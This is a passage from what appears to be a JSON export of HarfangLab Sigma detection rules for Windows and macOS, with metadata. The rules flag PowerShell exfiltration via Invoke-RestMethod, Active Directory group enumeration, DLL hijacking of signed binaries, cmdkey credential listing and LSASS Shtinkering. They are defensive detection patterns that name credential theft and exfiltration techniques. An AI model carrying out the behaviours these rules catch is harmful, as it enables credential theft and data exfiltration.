"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623724Z",
"creation_date": "2026-03-23T11:45:34.623727Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf",
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1059_001_data_exfiltration_invoke_restmethod.yml",
"content": "title: Data Exfiltration via Invoke-RestMethod\nid: 12043ba4-4c8f-42df-8036-1677ede6fb84\ndescription: |\n Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\n Attackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\n It is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\nreferences:\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/30\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Invoke-RestMethod '\n - ' -Ur' # -Uri\n - ' -Me' # -Method\n - ' -I' # -InFile\n - ' POST'\n ScriptNumberOfLines: 1\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12043ba4-4c8f-42df-8036-1677ede6fb84",
"rule_name": "Data Exfiltration via Invoke-RestMethod",
"rule_description": "Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\nAttackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\nIt is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\n",
"rule_creation_date": "2026-01-30",
"rule_modified_date": "2026-03-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12345a32-eabd-4124-ad05-d724d29e4fd1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083577Z",
"creation_date": "2026-03-23T11:45:34.083580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083584Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_002_domain_group_discovered_powershell.yml",
"content": "title: Domain Group Discovered via PowerShell\nid: 12345a32-eabd-4124-ad05-d724d29e4fd1\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory groups.\n This may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=group'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12345a32-eabd-4124-ad05-d724d29e4fd1",
"rule_name": "Domain Group Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory groups.\nThis may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12abc941-fc36-4c0f-97cf-0f380e889982",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099100Z",
"creation_date": "2026-03-23T11:45:34.099102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setup.yml",
"content": "title: DLL Hijacking via Setup.exe\nid: 12abc941-fc36-4c0f-97cf-0f380e889982\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Setup.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\dlmgr.dll'\n filter_legitimate_image:\n - Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12abc941-fc36-4c0f-97cf-0f380e889982",
"rule_name": "DLL Hijacking via Setup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094687Z",
"creation_date": "2026-03-23T11:45:34.094689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094693Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_groups_macos.yml",
"content": "title: Groups Listed via Groups\nid: 12d65b1e-e1ac-4617-86a9-eda02d5297ad\ndescription: |\n Detects the execution of the groups command.\n Attackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/groups'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_common_folder:\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad",
"rule_name": "Groups Listed via Groups",
"rule_description": "Detects the execution of the groups command.\nAttackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12fbe22c-6804-46a4-9668-d8c5dca77830",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605747Z",
"creation_date": "2026-03-23T11:45:34.605750Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605757Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1078/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1087_account_credentials_cmdkey.yml",
"content": "title: Account Credentials Discovered via cmdkey.exe\nid: 12fbe22c-6804-46a4-9668-d8c5dca77830\ndescription: |\n Detects the execution of cmdkey.\n Attackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\n Cmdkey can also be used to add or delete credentials to/from the cache.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1078/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1552\n - attack.discovery\n - attack.t1087\n - attack.initial_access\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cmdkey\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\cmdkey.exe'\n - OriginalFileName: 'cmdkey.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - '/list'\n - '-list'\n\n exclusion_fiducial:\n ParentImage|endswith: '\\fermage.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12fbe22c-6804-46a4-9668-d8c5dca77830",
"rule_name": "Account Credentials Discovered via cmdkey.exe",
"rule_description": "Detects the execution of cmdkey.\nAttackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\nCmdkey can also be used to add or delete credentials to/from the cache.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.initial_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1087",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13135882-44de-4952-9602-946619060e2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591331Z",
"creation_date": "2026-03-23T11:45:34.591334Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eduprintprov.yml",
"content": "title: DLL Hijacking via eduprintprov.exe\nid: 13135882-44de-4952-9602-946619060e2e\ndescription: |\n Detects potential Windows DLL Hijacking via eduprintprov.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eduprintprov.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\policymanager.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13135882-44de-4952-9602-946619060e2e",
"rule_name": "DLL Hijacking via eduprintprov.exe",
"rule_description": "Detects potential Windows DLL Hijacking via eduprintprov.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1326ca37-dc76-44d4-8db5-d101df291be4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089206Z",
"creation_date": "2026-03-23T11:45:34.089208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcbuilder.yml",
"content": "title: DLL Hijacking via mcbuilder.exe\nid: 1326ca37-dc76-44d4-8db5-d101df291be4\ndescription: |\n Detects potential Windows DLL Hijacking via mcbuilder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcbuilder.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcp47mrm.dll'\n - '\\mrmcoreR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1326ca37-dc76-44d4-8db5-d101df291be4",
"rule_name": "DLL Hijacking via mcbuilder.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mcbuilder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13384352-88eb-420b-a83a-24445d5a52c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095469Z",
"creation_date": "2026-03-23T11:45:34.095471Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095475Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_shtinkering.yml",
"content": "title: Possible LSASS Shtinkering Detected\nid: 13384352-88eb-420b-a83a-24445d5a52c4\ndescription: |\n Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\nreferences:\n - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/04/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n SourceImage: '*\\WerFault.exe'\n ProcessCommandLine|contains: ' -u -p * -ip * -s *'\n\n exclusion_werfault:\n SourceImage: '*\\WerFault.exe'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: '?:\\Windows\\System32\\lsass.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
